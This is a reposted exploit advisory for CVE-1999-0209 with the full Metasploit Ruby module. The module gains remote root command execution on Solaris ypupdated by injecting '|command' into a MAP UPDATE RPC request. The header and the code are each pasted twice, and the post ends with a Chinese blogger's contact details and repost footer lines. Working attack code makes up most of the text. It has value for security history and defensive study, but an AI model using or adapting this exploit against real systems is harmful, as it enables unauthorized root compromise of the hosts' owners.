Exploit ID: CAU-EX-2008-0001
Release Date: 2008.04.04
Title: ypupdated_exec.rb
Description: Solaris ypupdated Command Execution
Tested: Solaris x86/sparc 10, sparc 9, 8, 2.7
Attributes: Remote, NULL Auth, Elevated Privileges, Metasploit
Exploit URL: [url]http://www.caughq.org/[/url] exploits/CAU-EX-2008-0001.txt
Author/Email: I)ruid
Description
===========
This exploit targets a weakness in the way the ypupdated RPC application
uses the command shell when handling a MAP UPDATE request. Extra
commands may be launched through this command shell, which runs as root
on the remote host, by passing commands in the format '|'.
Credits
=======
Josh D.
credited with originally discovering this vulnerability.
This Metasploit exploit module was modeled after kcope's exploit
released to Milw0rm on 2008.03.20.
References
==========
[url]http://osvdb.org/displayvuln..php?osvdb_id=11517[/url]
[url]http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0209[/url]
[url]http://www.securityfocus.com/bid/1749/info[/url]
[url]http://www.milw0rm.com/exploits/5282[/url]
Metasploit
==========
Release Date: 2008.04.04
Title: ypupdated_exec.rb
Description: Solaris ypupdated Command Execution
Tested: Solaris x86/sparc 10, sparc 9, 8, 2.7
Attributes: Remote, NULL Auth, Elevated Privileges, Metasploit
Exploit URL: [url]http://www.caughq.org/[/url] exploits/CAU-EX-2008-0001.txt
Author/Email: I)ruid
Description
===========
This exploit targets a weakness in the way the ypupdated RPC application
uses the command shell when handling a MAP UPDATE request. Extra
commands may be launched through this command shell, which runs as root
on the remote host, by passing commands in the format '|'.
Credits
=======
Josh D.
credited with originally discovering this vulnerability.
This Metasploit exploit module was modeled after kcope's exploit
released to Milw0rm on 2008.03.20.
References
==========
[url]http://osvdb.org/displayvuln..php?osvdb_id=11517[/url]
[url]http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0209[/url]
[url]http://www.securityfocus.com/bid/1749/info[/url]
[url]http://www.milw0rm.com/exploits/5282[/url]
Metasploit
==========
require 'msf/core'
module Msf
class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote
include Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris ypupdated Command Execution',
'Description' => %q{
This exploit targets a weakness in the way the ypupdated RPC
application uses the command shell when handling a MAP UPDATE
request. Extra commands may be launched through this command
shell, which runs as root on the remote host, by passing
commands in the format '|<command>'.
Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
ypupdated is started with the '-i' command-line option.
},
'Author' => [ 'I)ruid <[email]druid@caughq.org[/email]>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 4498 $',
'References' =>
[
['BID', '1749'],
['CVE', '1999-0209'],
['OSVDB', '11517'],
],
'Privileged' => true,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
hostname = datastore['HOSTNAME']
program = 100028
progver = 1
procedure = 1
print_status 'Sending PortMap request for ypupdated program'
pport = sunrpc_create('udp', program, progver)
print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"
print_status 'Waiting for response...'
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
command = '|' + payload.encoded
msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
sunrpc_call(procedure, msg)
sunrpc_destroy
print_good 'No Errors, appears to have succeeded!'
rescue ::Rex::Proto::SunRPC::RPCTimeout
print_status 'Warning: ' + $!
print_status 'Exploit may or may not have succeeded.'
end
end
end
module Msf
class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote
include Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris ypupdated Command Execution',
'Description' => %q{
This exploit targets a weakness in the way the ypupdated RPC
application uses the command shell when handling a MAP UPDATE
request. Extra commands may be launched through this command
shell, which runs as root on the remote host, by passing
commands in the format '|<command>'.
Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
ypupdated is started with the '-i' command-line option.
},
'Author' => [ 'I)ruid <[email]druid@caughq.org[/email]>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 4498 $',
'References' =>
[
['BID', '1749'],
['CVE', '1999-0209'],
['OSVDB', '11517'],
],
'Privileged' => true,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
hostname = datastore['HOSTNAME']
program = 100028
progver = 1
procedure = 1
print_status 'Sending PortMap request for ypupdated program'
pport = sunrpc_create('udp', program, progver)
print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"
print_status 'Waiting for response...'
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
command = '|' + payload.encoded
msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
sunrpc_call(procedure, msg)
sunrpc_destroy
print_good 'No Errors, appears to have succeeded!'
rescue ::Rex::Proto::SunRPC::RPCTimeout
print_status 'Warning: ' + $!
print_status 'Exploit may or may not have succeeded.'
end
end
end
--
网蝉(NetCicala)
==============================
主页:[url]http://www.netcicala.com[/url]
UC:38378943
UC群:5955365
QQ:53163108
MSN:NetCicala@163.com
Email:NetCicala@163.com
主页:[url]http://www.netcicala.com[/url]
UC:38378943
UC群:5955365
QQ:53163108
MSN:NetCicala@163.com
Email:NetCicala@163.com
Google MailList:NetCicala@googlegroups.com
转载于:https://blog.51cto.com/netwalk/70574
4402
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
